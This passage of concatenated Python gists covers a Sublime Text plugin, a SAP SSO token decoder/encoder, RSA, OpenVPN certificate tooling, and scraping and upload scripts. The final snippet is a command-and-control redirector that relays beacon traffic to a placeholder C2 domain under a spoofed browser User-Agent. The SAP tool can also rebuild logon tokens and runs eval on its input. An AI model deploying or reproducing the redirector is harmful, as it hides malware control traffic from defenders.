for v in win.views():
fn = v.file_name()
if fn and v != view:
dirs.append(os.path.dirname(fn))
dirs = list(set(dirs))
# relative from project folers ? (sidebar folders)
for f in win.folders():
if self.try_open_file(f, text, row=row):
return
# relative from other views ?
for d in dirs:
if self.try_open_file(d, text, row=row):
return
# search match part of path from all open views
# ex)
# text = 'a/b/c/hello/world.txt'
# open_file_path = '/Users/someone/aaaa/bbb/a/b/c/d/e/f/hoge.txt'
# match '/a/b/c/'
# --> try_open '/Users/someone/aaaa/bbb/a/b/c/hello/world.txt'
sep = os.path.sep
if dirs and text.find(sep) > -1:
t = os.path.normpath(text).split(sep)
dirs = [d+sep for d in dirs]
for i in range(len(t)-1, 0, -1):
chunk = sep+sep.join(t[:i])+sep
for d in dirs:
j = 0
while j > -1:
j = d.find(chunk, j+1)
if j > -1 and self.try_open_file(d[:j], text, row=row):
return
self.goto_anything(text)
return
def goto_anything(self, text):
win = self.window
# open "goto anything" with text
print("show_overlay goto", text)
row = 1
m = re.search(r':(\d+)$', text)
if m:
row = int(m.group(1))
text = re.sub(r':\d+$', '', text)
win.run_command("show_overlay", {
"overlay": "goto", "show_files": True, "text": text, })
view = win.active_view()
size = view.size()
win.run_command("insert", {"characters": ' '})
if size != view.size():
win.run_command("undo")
else:
win.run_command("left_delete")
if row != 1:
win.run_command(
"insert",
{"characters": ':{}'.format(row)})
def try_open_file(self, *args, **kwargs):
path = os.path
args = list(args)
r = kwargs.get('row', 1)
# join path
fpath = args.pop(0)
for f in args:
fpath = path.join(fpath, f)
# isfile ?
if path.isfile(fpath):
print(fpath)
self.jump(fpath, r)
return True
# dir exists ?
fdir = path.dirname(fpath)
if not path.isdir(fdir):
return False
# abbr ".ext" ?
names = [f for f in os.listdir(fdir)
if path.isfile(path.join(fdir, f))]
fname = path.basename(fpath)+'.'
names = [n for n in names
if n.startswith(fname)]
if len(names) == 0:
return False
# found !
print("found", names)
files = {} # ext map
for n in names:
_, ext = path.splitext(n)
if ext:
files[ext.lower()] = path.join(fdir, n)
if len(files) == 0:
# unknown file paturn
return False
if self.ext in files:
# sameas active_view
solved = files[self.ext]
else:
print(files.values())
solved = list(files.values())[0]
print(solved)
self.jump(solved, r)
return True
def goto_symbol(self, text):
self.text = text
win = self.window
view = win.active_view()
sel = view.sel()[0]
row, col = view.rowcol(sel.begin())
row += 1
loc = self.find_in_scope(text, row)
if loc:
region, r, c = loc
self.jump(view.file_name(), r, c, text, region)
return
locs = win.lookup_symbol_in_open_files(text)
print('lookup_symbol_in_open_files: {}'.format(len(locs)))
if len(locs) == 1:
fpath, fname, rowcol = locs[0]
if fpath != view.file_name() and rowcol[0] != row:
self.jump(fpath, rowcol[0], rowcol[1], text)
return
elif len(locs) > 1:
return self.show_location_panel(
locs, name="lookup_symbol_in_open_files")
locs = win.lookup_symbol_in_index(text)
print('lookup_symbol_in_index: {}'.format(len(locs)))
if len(locs) == 1:
fpath, fname, rowcol = locs[0]
if fpath != view.file_name() and rowcol[0] != row:
self.jump(fpath, rowcol[0], rowcol[1], text)
return
elif len(locs) > 1:
return self.show_location_panel(
locs, name="lookup_symbol_in_index")
# locs = self.find_in_views(text, [view])
# if len(locs) > 1:
# return self.show_location_panel(
# locs, row=row, name="find_in_view")
# if self.find_in_other_views(text):
# return
self.goto_symbol_in_project(text)
# self.find_files()
return
def goto_symbol_in_project(self, text):
win = self.window
win.run_command("hide_panel", {"cancel": True})
win.run_command("hide_overlay")
sublime.set_timeout(
lambda: sublime.set_timeout(
lambda: self.goto_symbol_in_project_(text)))
return True
def goto_symbol_in_project_(self, text):
win = self.window
win.run_command("goto_symbol_in_project")
win.run_command("insert", {"characters": text})
return True
def jump(self, fpath, r=1, c=1, text=None, region=None):
win = self.window
view = self.origin_view
if fpath:
if r == 1 and c == 1:
target = win.open_file(fpath)
else:
target = win.open_file(
fpath+":" + str(r) + ":" + str(c),
sublime.ENCODED_POSITION)
else:
target = view
# if view != target and win.num_groups() > 1:
# g1, i1 = win.get_view_index(view)
# g2, i2 = win.get_view_index(target)
# if g1 == g2:
# # move to right group
# g = (g1 + 1) % win.num_groups()
# win.set_view_index(target, g, 0)
# win.focus_view(view)
win.focus_view(target)
self.scroll(target, fpath, r, c, text, region)
return
def scroll(self, view, fpath, r=1, c=1, text=None, region=None):
if sublime.active_window() != self.window:
print("changed active_window")
return
if self.window.active_view() != view:
print("changed active_view")
return
if view.is_loading() or view.file_name() != fpath:
print("retry scroll")
sublime.set_timeout(
lambda: self.scroll(view, fpath, r, c, text, region), 300)
return
if not region:
point = view.text_point(r-1, c-1)
if text:
line = view.line(point)
region = view.find(text, line.begin(), sublime.LITERAL)
elif r > 1:
region = Region(point, point)
if region:
if region.a == region.b and text:
region = view.find(text, region.a-1, sublime.LITERAL)
view.show_at_center(region)
view.sel().clear()
view.sel().add(region)
if not view.visible_region().contains(region):
sublime.set_timeout(
lambda: self.scroll(view, fpath, r, c, text, region), 300)
self.window.focus_view(view)
def find_files(self):
win = self.window
win.run_command("show_panel", {
"panel": "find_in_files", })
win.run_command("slurp_find_string")
return
def find_in_other_views(self, text):
win = self.window
view = win.active_view()
views = [v for v in win.views()
if v.file_name() and v.file_name() != view.file_name()]
if len(views) > 0:
locs = self.find_in_views(text, views)
if len(locs) > 0:
self.show_location_panel(locs, name="find_in_otherviews")
return True
return False
def show_location_panel(self, locations, name='quick_panel', row=False):
win = self.window
if self.quick_panel:
return
print('open: '+name)
self.quick_panel = name
self.locations = locations
view = win.active_view()
selindex = 0
items = []
for i in range(0, len(locations)):
l = locations[i]
# if row is False:
# if l[2][0] == row:
# selindex = i
# line = view.line(view.text_point(l[2][0]-1, 0))
# item = ['{:03}'.format(l[2][0])+':'+view.substr(line)]
# else:
item = self.shortest(l[0])+':'+str(l[2][0])+':'+str(l[2][1])
items.append(item)
print(items)
flags = 0
sel = view.sel()[0]
self.rollback = [(view, sel)]
win.show_quick_panel(
items, self.on_done, flags, selindex, self.on_highlight)
def shortest(self, fpath):
win = self.window
view = win.active_view()
base = view.file_name()
paths = [fpath]
if base:
base = os.path.dirname(base)
paths.append(os.path.relpath(fpath, base))
for f in win.folders():
f = f+'/'
if fpath.startswith(f):
paths.append(fpath[len(f):])
paths = [(len(s), s) for s in paths]
paths.sort()
return paths[0][1]
def on_done(self, index):
self.quick_panel = None
win = self.window
for v, r in reversed(self.rollback):
if isinstance(r, (Region, Selection)):
v.sel().clear()
v.sel().add(r)
v.show_at_center(r)
else:
g, i = r
win.set_view_index(v, g, i)
win.focus_view(self.origin_view)
if index == -1:
return
locs = self.locations
text = self.text
fpath, fname, rowcol = locs[index]
r, c = rowcol
self.jump(fpath, r, c, text)
def on_highlight(self, index):
win = self.window
locs = self.locations
fpath, fname, rowcol = locs[index]
r, c = rowcol
v = win.find_open_file(fpath)
g1, g2 = 0, 0
if v:
g1, _ = win.get_view_index(self.origin_view)
g2, i = win.get_view_index(v)
if v and g1 != g2:
win.set_view_index(v, g1, 0)
self.rollback.append((v, (g2, i)))
else:
v = win.open_file(
fpath + ":" + str(rowcol[0]) + ":" + str(rowcol[1]),
sublime.TRANSIENT | sublime.ENCODED_POSITION)
line = v.line(v.text_point(r-1, c-1))
region = v.find(self.text, line.begin(), sublime.LITERAL)
sel = v.sel()[0]
self.rollback.append((v, sel))
v.sel().clear()
v.sel().add(region)
v.show_at_center(region)
def find_in_views(self, text, views):
results = []
for view in views:
fpath = view.file_name()
if not fpath:
continue
for region in view.find_all('\\b'+text+'\\b'):
r, c = view.rowcol(region.begin())
r, c = r+1, c+1
results.append((fpath, fpath, (r, c)))
return results
def find_in_scope(self, text, row):
win = self.window
view = win.active_view()
rows = self.get_scoped_rowdict(row)
results = view.find_all('\\b'+text+'\\b')
result_up = []
result_down = []
for region in results:
r, c = view.rowcol(region.begin())
r, c = r+1, c+1
if r >= row and len(result_up) > 0:
break
if r in rows:
lv = rows[r][0]
line = view.line(region.begin())
before = view.substr(Region(line.begin(), region.begin()))
# after = view.substr(Region(region.end(), line.end()))
if re.search(r'[=\)\[\]\{\}]', before):
# maybe expr
continue
if r < row:
result_up.append((-lv, r, c, region))
elif r > row:
result_down.append((region, r, c))
if len(result_up) > 0:
result_up.sort()
result_up = [(a[3], a[1], a[2]) for a in result_up]
return result_up[0]
if len(result_down):
return result_down[0]
return None
def get_scoped_rowdict(self, row):
win = self.window
view = win.active_view()
rows = {}
text = view.substr(Region(0, view.size()))
lines = text.split("\n")
cur = 0
indents = []
for ln in lines:
if self.is_comment(ln):
indents.append(False)
continue
m = re.search(r'^[ \t]*', ln)
i = len(m.group(0))
if i == len(ln):
indents.append((cur, ln))
else:
indents.append((i, ln))
cur = i
if not indents[row-1]:
return {}
cur = indents[row-1][0]
for r in range(row, 0, -1):
if not indents[r-1]:
continue
i = indents[r-1][0]
if i == cur:
rows[r] = (i*10, indents[r-1][1])
elif i < cur:
# up scope
rows[r] = (i*10+5, indents[r-1][1])
# add same scope lines after row
for rr in range(row+1, len(indents)+1):
if not indents[rr-1]:
continue
j = indents[rr-1][0]
if j < i:
break
elif j == i:
rows[rr] = (j*10, indents[rr-1][1])
cur = i
return rows
def get_undercursor(self):
view = self.view
sel = view.sel()[0]
pos = sel.begin()
line = view.line(pos)
before = view.substr(Region(line.begin(), pos))
after = view.substr(Region(pos, line.end()))
is_symbol = False
for sep1, sep2 in [('"', '"'), ("'", "'"), ("<", ">"), ]:
if before.find(sep1) == -1 or after.find(sep2) == -1:
continue
b = before.split(sep1)
a = after.split(sep2)
if len(b) > 1 and len(b) % 2 == 0:
text = b[-1] + a[0]
text, is_symbol = self.mod_bracket_text(text, sep1, b, a)
text = re.sub(r'\{.*\}', '', text)
if text.find('./') > -1:
text = os.path.normpath(text)
return text, is_symbol
b = re.split(r'[\s\n\r]', before)
a = re.split(r'[\s\n\r]', after)
text = b[-1] + a[0]
text, is_symbol = self.mod_space_sep_text(text, b, a)
if text.find('/') > -1:
test = re.split(r'[\[\]\(\)\{\}\!\#\,\<\>]', text)
if len(test) == 1:
return text, is_symbol
is_symbol = True
# word = view.word(pos)
# text = view.substr(word).strip()
b = re.search(r'[a-zA-Z0-9_$\-]*$', before).group(0) # include '-'
a = re.search(r'^[a-zA-Z0-9_$\-]*', after).group(0)
text = b + a
if text:
view.sel().clear()
view.sel().add(Region(pos-len(b), pos+len(a)))
return text, is_symbol
def is_comment(self, ln):
ln = ln.lstrip()
lit = COMMENT_LIT.get(self.ext, None)
if lit and ln.startswith(lit):
return True
return False
def mod_bracket_text(self, text, sep, b, a):
if self.ext == '.html':
if sep in ('"', "'") and b[-2].endswith('='):
attr = b[-2].split(' ')[-1].lower()
if attr == 'class=':
return b[-1].split(' ')[-1]+a[0].split(' ')[0], True
elif attr in ('src=', 'href=', 'action='):
return text, False
else:
return text, True
elif sep == '<':
# tagName or attributeName
b = re.split(r'[\s=]', b[-1])
a = re.split(r'[\s=]', a[0])
return b[-1]+a[0], True
return text, False
def mod_space_sep_text(self, text, b, a):
if self.ext == '.py':
if len(b) > 2 and b[-2] == 'from' and a[1] == 'import':
if text[:2] == '..':
text = '{parentdir}'+text[2:]
if text[0] == '.':
text = '{currentdir}'+text[1:]
text = text.replace('.', '/')
text = text.replace('{parentdir}', '../')
text = text.replace('{currentdir}', './')
return text, False
return text, False
COMMENT_LIT = {
'.py': '#',
'.lua': '--',
'.js': '//',
'.coffee': '#',
'.rb': '#',
'.c': '//',
'.cpp': '//',
'.h': '//',
'.html': '<!--',
'.css': '/*',
}
```
#### File: hard-gists/8f3b0a678011ac74c61b/snippet.py
```python
import sys
import fileinput
import urllib.parse
import base64
import binascii
import re
import struct
def hexdump(data):
while len(data) > 0:
(cur, data) = (data[:16],data[16:])
print("| {:<48}| {:<16} |".format(str(re.sub(b'(.{2})', b'\\1 ', binascii.hexlify(cur)), 'ascii'), str(re.sub(b'[\x00-\x1f\x80-\xff]', b'.', cur), 'ascii')))
def decodeSAPToken(token, format=False):
(v, id, token) = (token[0], token[1:5], token[5:])
if format:
print("Version = " + str(v))
print("ID = " + str(id, 'ascii'))
else:
print(str(v) + ":" + str(id, 'ascii'))
while len(token) > 0:
((type, length), token) = (struct.unpack('!BH', token[:3]), token[3:])
(value, token) = (token[:length], token[length:])
if format:
print("Type={:02x} Length={:d}".format(type, length))
if type == 0x01 or type == 0x0a:
print("Username = " + str(value, 'ascii'))
elif type == 0x02:
print("Client = " + str(value, 'ascii'))
elif type == 0x03:
print("System = " + str(value, 'ascii'))
elif type == 0x04:
print("Toke issued at = " + str(value, 'ascii'))
elif type == 0x88:
print("Authentication type = " + str(value, 'ascii'))
elif type == 0xff:
print("Signature:")
hexdump(value)
else:
hexdump(value)
print()
else:
print(str(type) + ":" + str(value)[2:-1])
def usage():
print("Usage:\n" + sys.argv[0] + " decode|decode2 <token>\n - OR -\n" + sys.argv[0] + " encode [<decode-formatted-files> ...]")
sys.exit()
### Main ###
if len(sys.argv) < 2:
usage()
if sys.argv[1] in ('decode', 'decode2'):
if len(sys.argv) != 3:
usage()
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2], 'ascii'), 'ascii'))
except binascii.Error:
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2] + '=', 'ascii'), 'ascii'))
except binascii.Error:
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2] + '==', 'ascii'), 'ascii'))
except:
print("Failed to complete missing padding - giving up!")
sys.exit()
if sys.argv[1] == 'decode':
decodeSAPToken(token)
else:
print("=== Raw ===")
hexdump(token)
print("=== Decoded ===")
decodeSAPToken(token, True)
elif sys.argv[1] == 'encode':
firstline = True
for line in fileinput.input(sys.argv[2:]):
line = line.rstrip("\n")
if firstline:
(v, id) = line.split(":")
ssotoken = struct.pack('!B4s', int(v), bytes(id, 'ascii'))
firstline = False
else:
(type, value) = line.split(":", 1)
value = eval("b'''" + value + "'''")
length = len(value)
ssotoken += struct.pack('!BH', int(type), int(length)) + value
print(urllib.parse.quote(str(base64.b64encode(ssotoken), 'ascii')))
```
#### File: hard-gists/8ff8e31ee1a2a9585a5a/snippet.py
```python
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA
from Crypto import Random
import base64
import StringIO
# passphrase, random string => private key, public key pair
# encrypt with public key
# decrypt with pem, passphrase
def gen_key_pair(passphrase):
random_generator = Random.new().read
key = RSA.generate(2048, random_generator)
return key.exportKey(passphrase=passphrase), key.publickey().exportKey()
def rsa_encrypt(message, pub):
keystream = StringIO.StringIO(pub)
pubkey = RSA.importKey(keystream.read())
h = SHA.new(message)
cipher = PKCS1_v1_5.new(pubkey)
return base64.encodestring(cipher.encrypt(message+h.digest()))
def rsa_decrypt(ciphertext, pem, passphrase):
ciphertext = base64.decodestring(ciphertext)
keystream = StringIO.StringIO(pem)
pemkey = RSA.importKey(keystream.read(), passphrase=passphrase)
dsize = SHA.digest_size
sentinel = Random.new().read(15+dsize)
cipher = PKCS1_v1_5.new(pemkey)
message = cipher.decrypt(ciphertext, sentinel)
digest = SHA.new(message[:-dsize]).digest()
if digest == message[-dsize:]:
return message[:-dsize]
else:
raise ValueError('Cannot decrypt message')
if __name__ == '__main__':
message = 'To be encrypted'
passphrase = '<PASSWORD>'
pem, pub = gen_key_pair(passphrase)
print 'Private Key:\n%s\n' % pem
print 'Public Key:\n%s\n' % pub
encdata = rsa_encrypt(message, pub)
print 'Encrypted Message:\n', encdata
decdata = rsa_decrypt(encdata, pem, passphrase)
print 'Decrypted Message:\n', decdata
```
#### File: hard-gists/900514/snippet.py
```python
from twitter_search import search_twitter
import random
import sys
import re
class Thingy(object):
def __init__(self, words):
self.words = words
self.begins = dict([(word, []) for word in words])
self.ends = dict([(word, []) for word in words])
def start(self):
import urllib
query = '?' + urllib.urlencode({'q': ' OR '.join(self.words), 'rpp': 100})
search_twitter(query, self.feed, maxpages=20)
def feed(self, tweet):
text = tweet['text']
for s in self.words:
loc = text.find(s.lower())
if loc != -1:
begins = text[loc:].split(" ")[:random.randrange(2,8)]
ends = text[:loc+len(s)].split(" ")[-random.randrange(2,8):]
self.begins[s].append(begins)
self.ends[s].append(ends)
def generate(self):
for i in range(1000):
s = random.choice(self.words)
begin = ' '.join(random.choice(self.begins[s]))
end = ' '.join(random.choice(self.ends[s]))
begin2 = ' '.join(random.choice(self.begins[s]))
begin3 = ' '.join(random.choice(self.begins[s]))
target = '\n\t'.join([': '.join([end, begin]), begin2, begin3])
if re.search(r'^[a-zA-Z,.:;?!\- \n\t]*$', target):
print target
generator = Thingy(['voicing', 'shucked', 'slant'])
generator.start()
generator.generate()
```
#### File: hard-gists/9012444/snippet.py
```python
from ghost import Ghost
from config import COOKIE_FILE, LOGIN_ID, LOGIN_PW
import urllib2
import cookielib
import Cookie
class NaverCrawler:
# Create a new crawler.
def __init__(self, id, pw, displayFlag = False):
# 새 Ghost instance를 만들어서 사용합니다.
self.ghost = Ghost(display = displayFlag, wait_timeout = 20)
self.currentPage = None
self.login(id, pw)
# Open the given page. If we are already on that page, do nothing.
def openPage(self, url):
if self.currentPage == url:
return
self.ghost.open(url)
self.ghost.wait_for_page_loaded()
self.currentPage = url
# Perform the Naver login.
def login(self, id, pw):
# Open the Naver main page.
self.openPage('http://www.naver.com')
# Fill in the login form that lives inside the inner frame and trigger a click.
# This part is done via JavaScript.
self.ghost.evaluate("""
(function() {
var innerDoc = document.getElementById('loginframe').contentWindow.document;
innerDoc.getElementById('id').value = '%s';
innerDoc.getElementById('pw').value = '%s';
innerDoc.getElementsByClassName('btn_login')[0].click();
})();
""" % (id, pw), expect_loading = True)
# Wait for the login result.
self.ghost.wait_for_selector('#query')
def cloneCookieJar(self):
cookieJar = cookielib.LWPCookieJar()
self.ghost.save_cookies(cookieJar)
return cookieJar
# Perform a search from the Naver main page.
def main_search(self, query):
# Open the Naver main page.
self.openPage('http://www.naver.com')
self.ghost.wait_for_selector('#query')
self.ghost.fill("#sform", { "query": query })
self.ghost.fire_on('#sform', 'submit', expect_loading = True)
if __name__ == "__main__":
crawler = NaverCrawler(LOGIN_ID, LOGIN_PW, False)
cj = crawler.cloneCookieJar()
cj.save(COOKIE_FILE)
```
#### File: hard-gists/905137/snippet.py
```python
import itertools
import mimetools
import mimetypes
from cStringIO import StringIO
import urllib
import urllib2
import gtk
class MultiPartForm(object):
"""Accumulate the data to be used when posting a form."""
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
"""Add a simple field to the form data."""
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
"""Add a file to be uploaded."""
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
"""Return a string representing the form data, including attached files."""
# Build a list of lists, each containing "lines" of the
# request. Each part is separated by a boundary string.
# Once the list is built, return a string where each
# line is separated by '\r\n'.
parts = []
part_boundary = '--' + self.boundary
# Add the form fields
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
# Add the files to upload
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
# Flatten the list and add closing boundary marker,
# then return CR+LF separated data
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
def screenshot(url, **args):
return WebKitScreenShot(url, **args).image
class WebKitScreenShot(object):
"""
make fullscreen webkit window, then take screenshot into self.image
"""
def __init__(self, url=None,
font_size=14,
font_default="VLGothic",
font_serif="VLGothic",
font_sans_serif="VLGothic",
font_monospace="VLGothic",
size=None):
import webkit
gtk.gdk.threads_init()
#gtk.gdk.threads_enter()
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
scr = gtk.ScrolledWindow()
window.move(0, 0)
if not size:
size = (gtk.gdk.screen_width(), gtk.gdk.screen_height())
window.resize(*size)
webview = webkit.WebView()
# webkit settings
settings = webkit.WebSettings()
settings.set_property("serif-font-family", font_serif)
settings.set_property("sans-serif-font-family", font_sans_serif)
settings.set_property("monospace-font-family", font_monospace)
settings.set_property("default-font-family", font_default)
settings.set_property("default-font-size", font_size)
webview.set_settings(settings)
#window.add(scr)
#scr.add(webview)
window.add(webview)
webview.connect("load-finished", self._loaded)
webview.open(url)
self.webview = webview
window.show_all()
self.window = window
gtk.main()
gtk.gdk.threads_leave()
def _loaded(self, view, frame):
gtk.gdk.threads_enter()
#import gtk
import Image
try:
#print dir(frame.get_global_context())
pixmap = view.get_snapshot()
#print pixmap.get_size()
width, height = view.window.get_size()
# see: http://www.pygtk.org/docs/pygtk/class-gdkpixbuf.html
pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,
False, 8, width, height)
#pixbuf.get_from_drawable(view.window, view.window.get_colormap(),
pixbuf.get_from_drawable(pixmap, view.window.get_colormap(),
0, 0, 0, 0, width, height)
self.image = Image.fromstring("RGB", (width, height),
pixbuf.get_pixels())
gtk.main_quit()
except:
import traceback
traceback.print_exc()
gtk.gdk.threads_leave()
def check_url(url):
from urlparse import urlparse
ret = urlparse(url)
scheme = ret.scheme
if scheme not in ["http", "https"]:
return False
hostname = ret.hostname
if hostname.startswith("192.168"):
return False
return True
def gyazo(url):
if not check_url(url):
print "Permission denied"
return
font = "VLGothic"
import Image
image = screenshot(url,
font_default=font, font_sans_serif=font,
font_serif=font, font_monospace=font)
import tempfile
tmp = tempfile.TemporaryFile()
image.save(tmp, "png")
tmp.seek(0)
form = MultiPartForm()
form.add_field('id', '')
form.add_file('imagedata', 'gyazo.com',
fileHandle=tmp)
request = urllib2.Request('http://gyazo.com/upload.cgi')
request.add_header('User-agent', 'Gyazo/1.0)')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Content-length', len(body))
request.add_data(body)
print urllib2.urlopen(request).read()
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.usage += " URL"
opts, args = parser.parse_args()
if len(args) == 0:
parser.print_help()
import sys
sys.exit(-1)
url = args[0]
gyazo(url)
```
#### File: hard-gists/9089444/snippet.py
```python
from django.conf import settings
from rest_framework import serializers
class HyperlinkedIdentityField(serializers.HyperlinkedIdentityField):
"""
This is a performance wrapper for HyperlinkedIdentityField.
We save a ton of time by not calling reverse potentially
thousands of times per request.
"""
def __init__(self, *args, **kwargs):
self.view_url = kwargs.pop("view_url", "")
super(HyperlinkedIdentityField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
return "http%s://%s%s" % (
"s" if not settings.DEBUG else "",
self.context["request"]._request.META["HTTP_HOST"],
self.view_url % obj.id,
)
# Example :
# items = HyperlinkedIdentityField(view_url="/api/subscriptions/%s/items/",
# view_name="subscription_item_list", pk_url_kwarg="subscription_id")
```
#### File: hard-gists/908ef5f4fa162f15b3b8/snippet.py
```python
import os
import socket
from OpenSSL import crypto, SSL
# OpenVPN is fairly simple since it works on OpenSSL. The OpenVPN server contains
# a root certificate authority that can sign sub-certificates. The certificates
# have very little or no information on who they belong to besides a filename
# and any required information. Everything else is omitted or blank.
# The client certificate and private key are inserted into the .ovpn file
# which contains some settins as well and the entire thing is then ready for
# the user.
# EasyRSA generates a standard unsigned certificate, certificate request, and private key.
# It then signs the certificate against the CA then dumps the certificate request in the trash.
# The now signed certificate and private key are returned.
# Create a new keypair of specified algorithm and number of bits.
def make_keypair(algorithm=crypto.TYPE_RSA, numbits=2048):
pkey = crypto.PKey()
pkey.generate_key(algorithm, numbits)
return pkey
# Creates a certificate signing request (CSR) given the specified subject attributes.
def make_csr(pkey, CN, C=None, ST=None, L=None, O=None, OU=None, emailAddress=None, hashalgorithm='sha256WithRSAEncryption'):
req = crypto.X509Req()
req.get_subject()
subj = req.get_subject()
if C:
subj.C = C
if ST:
subj.ST = ST
if L:
subj.L = L
if O:
subj.O = O
if OU:
subj.OU = OU
if CN:
subj.CN = CN
if emailAddress:
subj.emailAddress = emailAddress
req.set_pubkey(pkey)
req.sign(pkey, hashalgorithm)
return req
# Create a certificate authority (if we need one)
def create_ca(CN, C="", ST="", L="", O="", OU="", emailAddress="", hashalgorithm='sha256WithRSAEncryption'):
cakey = make_keypair()
careq = make_csr(cakey, CN=CN)
cacert = crypto.X509()
cacert.set_serial_number(0)
cacert.gmtime_adj_notBefore(0)
cacert.gmtime_adj_notAfter(60*60*24*365*10) # 10 yrs - hard to beat this kind of cert!
cacert.set_issuer(careq.get_subject())
cacert.set_subject(careq.get_subject())
cacert.set_pubkey(careq.get_pubkey())
cacert.set_version(2)
# Set the extensions in two passes
cacert.add_extensions([
crypto.X509Extension('basicConstraints', True,'CA:TRUE'),
crypto.X509Extension('subjectKeyIdentifier' , True , 'hash', subject=cacert)
])
# ... now we can set the authority key since it depends on the subject key
cacert.add_extensions([
crypto.X509Extension('authorityKeyIdentifier' , False, 'issuer:always, keyid:always', issuer=cacert, subject=cacert)
])
cacert.sign(cakey, hashalgorithm)
return (cacert, cakey)
# Create a new slave cert.
def create_slave_certificate(csr, cakey, cacert, serial):
cert = crypto.X509()
cert.set_serial_number(serial)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(60*60*24*365*10) # 10 yrs - hard to beat this kind of cert!
cert.set_issuer(cacert.get_subject())
cert.set_subject(csr.get_subject())
cert.set_pubkey(csr.get_pubkey())
cert.set_version(2)
extensions = []
extensions.append(crypto.X509Extension('basicConstraints', False ,'CA:FALSE'))
extensions.append(crypto.X509Extension('subjectKeyIdentifier' , False , 'hash', subject=cert))
extensions.append(crypto.X509Extension('authorityKeyIdentifier' , False, 'keyid:always,issuer:always', subject=cacert, issuer=cacert))
cert.add_extensions(extensions)
cert.sign(cakey, 'sha256WithRSAEncryption')
return cert
# Dumps content to a string
def dump_file_in_mem(material, format=crypto.FILETYPE_PEM):
dump_func = None
if isinstance(material, crypto.X509):
dump_func = crypto.dump_certificate
elif isinstance(material, crypto.PKey):
dump_func = crypto.dump_privatekey
elif isinstance(material, crypto.X509Req):
dump_func = crypto.dump_certificate_request
else:
raise Exception("Don't know how to dump content type to file: %s (%r)" % (type(material), material))
return dump_func(format, material)
# Loads the file into the appropriate openssl object type.
def load_from_file(materialfile, objtype, format=crypto.FILETYPE_PEM):
if objtype is crypto.X509:
load_func = crypto.load_certificate
elif objtype is crypto.X509Req:
load_func = crypto.load_certificate_request
elif objtype is crypto.PKey:
load_func = crypto.load_privatekey
else:
raise Exception("Unsupported material type: %s" % (objtype,))
with open(materialfile, 'r') as fp:
buf = fp.read()
material = load_func(format, buf)
return material
def retrieve_key_from_file(keyfile):
return load_from_file(keyfile, crypto.PKey)
def retrieve_csr_from_file(csrfile):
return load_from_file(csrfile, crypto.X509Req)
def retrieve_cert_from_file(certfile):
return load_from_file(certfile, crypto.X509)
def make_new_ovpn_file(ca_cert, ca_key, clientname, serial, commonoptspath, filepath):
# Read our common options file first
f = open(commonoptspath, 'r')
common = f.read()
f.close()
cacert = retrieve_cert_from_file(ca_cert)
cakey = retrieve_key_from_file(ca_key)
# Generate a new private key pair for a new certificate.
key = make_keypair()
# Generate a certificate request
csr = make_csr(key, clientname)
# Sign the certificate with the new csr
crt = create_slave_certificate(csr, cakey, cacert, serial)
# Now we have a successfully signed certificate. We must now
# create a .ovpn file and then dump it somewhere.
clientkey = dump_file_in_mem(key)
clientcert = dump_file_in_mem(crt)
cacertdump = dump_file_in_mem(cacert)
ovpn = "%s<ca>\n%s</ca>\n<cert>\n%s</cert>\n<key>\n%s</key>\n" % (common, cacertdump, clientcert, clientkey)
# Write our file.
f = open(filepath, 'w')
f.write(ovpn)
f.close()
if __name__ == "__main__":
make_new_ovpn_file("ca.crt", "ca.key", "justasictest", 0x0C, "common.txt", "justastictest.ovpn")
print("Done")
```
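The `__main__` block above reads an existing `ca.crt`/`ca.key` pair from disk but never shows how to produce one, even though `create_ca` is defined. A minimal bootstrap sketch follows; the CA common name is a placeholder, and the output file names simply match what the example expects:

```python
from OpenSSL import crypto

# One-time CA bootstrap (illustrative only): generate a self-signed CA and
# write out the files that make_new_ovpn_file() above reads back in.
cacert, cakey = create_ca(CN="Example-VPN-CA")
with open("ca.crt", "wb") as f:
    f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cacert))
with open("ca.key", "wb") as f:
    f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, cakey))
```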
#### File: hard-gists/90fe4a3bc0caa582fc563ec503e5444c/snippet.py
```python
import logging
import urllib
import webapp2
import urllib2
# v1.0.1 - updated to support POST request
# change to your IP
redirector = "(insert you C2 domain here)"
class CommandControl(webapp2.RequestHandler):
def get(self, data):
url = 'https://'+redirector+'/'+str(data)
try:
req = urllib2.Request(url)
req.add_header('User-Agent',"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
for key, value in self.request.headers.iteritems():
req.add_header(str(key), str(value))
resp = urllib2.urlopen(req)
content = resp.read()
self.response.write(content)
except urllib2.URLError:
"Caught Exception, did nothing"
# handle a POST request
def post(self, data):
url = 'https://'+redirector+'/'+str(data)
try:
req = urllib2.Request(url)
req.add_header('User-Agent',"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
for key, value in self.request.headers.iteritems():
req.add_header(str(key), str(value))
# this passes on the data from CB
req.data = self.request.body
resp = urllib2.urlopen(req)
content = resp.read()
self.response.write(content)
except urllib2.URLError:
"Caught Exception, did nothing"
app = webapp2.WSGIApplication([
